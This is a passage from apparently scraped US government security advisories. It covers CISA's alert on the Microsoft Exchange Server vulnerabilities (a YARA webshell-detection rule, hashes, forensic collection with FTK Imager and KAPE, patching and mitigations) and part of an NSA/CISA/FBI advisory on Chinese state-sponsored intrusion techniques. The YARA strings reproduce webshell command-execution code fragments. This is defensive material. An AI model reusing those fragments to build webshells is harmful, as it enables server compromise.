string.Empty;\" \n$var2 = \"newcook.Expires = DateTime.Now.AddDays(\" \n$var3 = \"System.Diagnostics.Process process = new System.Diagnostics.Process();\" \n$var4 = \"process.StandardInput.WriteLine(HttpContext.Current.Request.Form[\\\"\" \n$var5 = \"else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form[\\\"\" \n$var6 = \"<input type=\\\"submit\\\" value=\\\"Upload\\\" />\" \n \ncondition: \nany of ($uniq*) or \nall of ($var*) \n}\n\nA list of webshell hashes have also been provided by Microsoft:\n\n * `b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0`\n * `097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e`\n * `2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1`\n * `65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5`\n * `511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1`\n * `4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea`\n * `811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d`\n * `1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944`\n\n**Note:** this is not an all-inclusive list of indicators of compromise and threat actors have been known to use short-term leased IP addresses that change very frequently. Organizations that do not locate any of the IOCs in this Alert within your network traffic, may nevertheless have been compromised. CISA recommends following the guidance located in the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to check your servers for any signs of a compromise. \n\n### Conduct Forensic Analysis\n\nShould your organization see evidence of compromise, your incident response should begin with conducting forensic analysis to collect artifacts and perform triage. Please see the following list of recommendations on how to conduct forensic analysis using various tools.\n\nAlthough the following free tools are not endorsed by the Federal Government, incident responders commonly use them to perform forensics.\n\nWhile collecting artifacts to perform triage, use processes and tools that minimize the alteration of the data being collected and that minimize impact to the operating system itself.\n\nIdeally, during data collection, store the data on removable/external media and, when possible, run the artifact collection tools from the same media.\n\nKey artifacts for triage that should be collected:\n\n * Memory\n * All registry hives\n * All windows event logs\n * All web logs\n\nMemory can be collected with a variety of open source tools (e.g., FTK Imager by AccessData, Ram Capture by Belkasoft).\n\nRegistry and Windows Event logs can be collected with a variety of open source tools as well (e.g., FTK_Imager, Kroll Artifact Parser And Extractor [KAPE]).\n\nWeb logs can also be collected with a variety of open source tools (e.g., FTK Imager).\n\n#### **Windows Artifact Collection Guide**\n\nExecute the following steps in order.\n\n**1) Download the latest FTK Imager** from <https://accessdata.com/product-download/>.\n\n * **Note:** Ensure your review of and compliance with the applicable license associated with the product referenced, which can be found in the product\u2019s User Guide. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\n**2) Collect memory from live system using FTK Imager.** See Memory Capture with FTK Imager.pdf for instructions. Note: Download and copy \u201cFTK Imager\u201d folder to an external drive. Run FTK Imager.exe from the FTK Imager folder from external drive. Wait until memory collect is complete before proceeding to step 2.\n\n**3) Collect important system artifacts using KAPE.** See KAPE Collection Procedure. Note: Download KAPE from a separate system; do not download KAPE to the target system. Run KAPE from external drive.\n\n**4) Collect disk image using FTK Imager. **See Live Image with FTK Imager.pdf for instructions. **Note:** Run FTK Imager.exe from the \u201cFTK Imager\u201d folder from external drive.\n\n#### **Memory Capture with FTK Imager**\n\n**1) Open FTK Imager.** Log into the system with Administrator privileges and launch \u201cFTK Imager.\u201d\n\n * **Note:** Ensure your review of and compliance with the applicable license associated with the product referenced. The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\n**2) Open \u201cCapture Memory.\"** Select \u201cCapture Memory\u2026\u201d from the File menu.\n\n\n\n_Figure 1: FTK Imager \u2013 Capture Memory Command_\n\n**3) Select Path and Filenames. **On the window that appears, use the \u201cBrowse\u201d button to identify the destination of the memory capture. Save the memory capture to an external device and not the main hard drive of the system. Doing so will prevent the saved file from overwriting any dataspace on the system.\n\n * Name the destination file with a descriptive name (i.e., hostname of the system).\n * Select the box \u201cInclude pagefile\u201d and provide a name of the pagefile that is descriptive of the system.\n * Do not select \u201cCreate AD1 file.\u201d\n\n\n\n_Figure 2: FTK Imager \u2013 Memory Capture _\n\n**4) Capture Memory.** Click on \u201cCapture Memory\u201d to begin the capture process. The process will take several minutes depending on the size of the pagefile and the amount of memory on the system.\n\n\n\n_Figure 3: FTK Imager \u2013 Capture Process_\n\n#### **KAPE Collection Procedure [[1](<https://ericzimmerman.github.io/KapeDocs/#!Pages%5C2.-Getting-started.md>)]**\n\n1) Download KAPE from <https://www.kroll.com/en/services/cyber-risk/investigate-and-respond/kroll-artifact-parser-extractor-kape>.\n\n2) Disable any antivirus or host protection mechanisms that prevent execution from removable media, or data loss prevention (DLP) mechanisms that restrict utilization of removable media.\n\n * Enable antivirus and host protection once this process is completed.\n\n3) Unzip Kape.zip and run gkape.exe as admin from your removable media\n\n4) **Target source **should be the drive on which the OS resides, typically C:.\n\n5) **Target destination **should be an external drive folder, not the same drive as the **Target source**. If available, use an external hard drive or flash drive.\n\n * A KAPE execution with these parameters will typically produce output artifacts with a total size of 1-25 GB.\n * If you are going to be running KAPE on different machines and want to save to the same drive, ensure the Target destination folder is unique for each execution of KAPE.\n\n6) Uncheck **Flush **checkbox (it is checked natively).\n\n7) Check **Add %d** and **Add %m** checkboxes.\n\n8) Select ALL checkboxes to ensure KAPE will target all available data that it is capable of targeting. This takes some time; use the down arrow and space bar to move through the list quickly.\n\n9) Check **Process VSCs** checkbox.\n\n10) Select **Zip **radio button and add Base name TargetOutput.\n\n11) Ensure **Deduplicate **checkbox is checked (it is checked natively).\n\n * At the bottom you should now see a large Current command line, similar to:\n\n.\\kape.exe --tsource C: --tdest E:\\%d%m --tflush --target !BasicCollection,!SANS_Triage,Avast,AviraAVLogs,Bitdefender,ComboFix,ESET,FSecure,HitmanPro,Malwarebytes, McAfee,McAfee_ePO,RogueKiller,SentinelOne,Sophos,SUPERAntiSpyware,Symantec_AV_Logs,TrendMicro,VIPRE, Webroot,WindowsDefender,Ammyy,AsperaConnect,BoxDrive,CiscoJabber,CloudStorage,ConfluenceLogs,Discord, Dropbox, Exchange,ExchangeClientAccess,ExchangeTransport,FileZilla,GoogleDrive,iTunesBackup,JavaWebCache,Kaseya,LogMeIn,Notepad++, OneDrive,OutlookPSTOST,ScreenConnect,Skype,TeamViewerLogs,TeraCopy,VNCLogs, Chrome,ChromeExtensions,Edge,Firefox,InternetExplorer,WebBrowsers,ApacheAccessLog,IISLogFiles,ManageEngineLogs, MSSQLErrorLog,NGINXLogs,PowerShellConsole,KapeTriage,MiniTimelineCollection,RemoteAdmin, VirtualDisks, Gigatribe,TorrentClients,Torrents,$Boot,$J,$LogFile,$MFT,$SDS,$T,Amcache,ApplicationEvents,BCD,CombinedLogs, EncapsulationLogging,EventLogs,EventLogs-RDP,EventTraceLogs, EvidenceOfExecution,FileSystem,GroupPolicy,LinuxOnWindowsProfileFiles,LnkFilesAndJumpLists,LogFiles,MemoryFiles, MOF,OfficeAutosave,OfficeDocumentCache,Prefetch,RDPCache,RDPLogs,RecentFileCache,Recycle, RecycleBin, RecycleBinContent,RecycleBinMetadata,RegistryHives,RegistryHivesSystem,RegistryHivesUser,ScheduledTasks,SDB, SignatureCatalog,SRUM,StartupInfo,Syscache,ThumbCache,USBDevicesLogs,WBEM,WER,WindowsFirewall, WindowsIndexSearch,WindowsNotifcationsDB,WindowsTimeline,XPRestorePoints --vss --zip TargetOutput \u2013gui\n\n * In the bottom right corner hit the** Execute! **Button.\n * Screenshot below shows `gkape.exe` during execution, you will also see a command window execute. **Note: **KAPE usually takes less than 20 minutes to complete on a workstation; if it is taking significantly longer there may be an issue.\n\n\n\n_Figure 4: gkape.exe screenshot_\n\n### Mitigations\n\nCISA strongly recommends organizations read [Microsoft\u2019s advisory](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [security blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) for more information on how to look for this malicious activity and to apply critical patches as soon as possible.\n\n_(Updated March 4, 2021):_ CISA is aware of threat actors using open source tools to search for vulnerable Microsoft Exchange Servers. This particular type of attack is scriptable, allowing attackers to easily exploit vulnerabilities through automated mechanisms. CISA advises all entities to patch as soon as possible to avoid being compromised. \n\n_(Updated March 4, 2021):_ From [Microsoft's patch release](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), the security updates are available for the following operating systems:\n\n * Exchange Server 2010 (update requires SP 3 or any SP 3 RU \u2013 this is a Defense in Depth update)\n * Exchange Server 2013 (update requires CU 23)\n * Exchange Server 2016 (update requires CU 19 or CU 18)\n * Exchange Server 2019 (update requires CU 8 or CU 7)\n\n_(Updated March 4, 2021):_ If you are running an older CU then what the patch will accept, you must upgrade to at least the required CU as stated above then apply the patch. \n\n_(Updated March 4, 2021):_ All patches must be applied using administrator privileges. \n\n\n_(Updated March 5, 2021)_: If patching is not an immediate option, CISA strongly recommends following alternative mitigations found in [Microsoft\u2019s blog on Exchange Server Vulnerabilities Mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>). However, these options should only be used as a temporary solution, not a replacement for patching. Additionally, there are other mitigation options available. CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following:\n\n * Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access; note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already in your network.\n * Block external access to on-premises Exchange: \n * Restrict external access to OWA URL: `/owa/`. \n * Restrict external access to Exchange Admin Center (EAC) aka Exchange Control Panel (ECP) URL:` /ecp/`.\n\n * _(Updated March 4, 2021):_ Disconnect vulnerable Exchange servers from the internet until a patch can be applied.\n\nCISA would like to thank Microsoft and Volexity for their contributions to this Alert.\n\n### Resources\n\n * (Updated April 14, 2021) **Microsoft's April 2021 Security Update **that mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.\n * _(Updated March 12, 2021) _[Check my OWA](<https://checkmyowa.unit221b.com/>) tool for checking if a system has been affected. _**Disclaimer:** this tool does not check against an exhaustive list of compromised domains. It is meant for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information and cannot assure its accuracy or completeness; therefore, entities should not rely solely on this information to justify foregoing CISA\u2019s recommendations for action described on this webpage._\n * Microsoft Advisory: <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * Microsoft Security Blog - Hafnium targeting Exchange Servers: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * Volexity Blog: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\n * Microsoft\u2019s blog on Exchange Server Vulnerabilities Mitigations: <https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>\n\n### References\n\n[Eric Zimmerman: KAPE Documentation](<https://ericzimmerman.github.io/KapeDocs/#!Pages%5C2.-Getting-started.md>)\n\n[Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities](<https://cyber.dhs.gov/ed/21-02/>)\n\n[Supplemental Direction V1 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities ](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction>)\n\n[Supplemental Direction V2 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>)\n\n### Revisions\n\nMarch 3, 2021: Initial Version|March 4, 2020: Updated Mitigations and Technical Details sections|March 5, 2021: Updated Mitigations Guidance from Microsoft|March 10, 2021: Updated TTP Section|March 12, 2021: Updated Resources Section|March 12, 2021: Added information on DearCry Ransomware |March 13, 2021: Added seven China Chopper Webshell MARs|March 14, 2021: Updated information on DearCry Ransomware|March 16, 2021: Added information on EOMT tool|March 25, 2021: Added two China Chopper Webshell MARs|March 25, 2021: Updated MARs to include YARA Rules|March 31, 2021: Added links to ED 21-02 and ED 21-02 Supplemental Direction|April 12, 2021: Added one China Chopper Webshell MAR and one DearCry Ransomware MAR|April 13, 2021: Added links to Microsoft's April 2021 Security Update and ED 21-02 Supplemental Direction V2|April 14, 2021: Added Exchange Server 2013 to list of on-premises Exchange Servers affected by the vulnerabilities dislcosed on April 13, 2021. |July 19, 2021: Added attribution note\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T12:00:00", "type": "ics", "title": "Mitigate Microsoft Exchange Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-07-19T12:00:00", "id": "AA21-062A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-10T00:07:53", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. \u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. \n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. \n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. \nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where 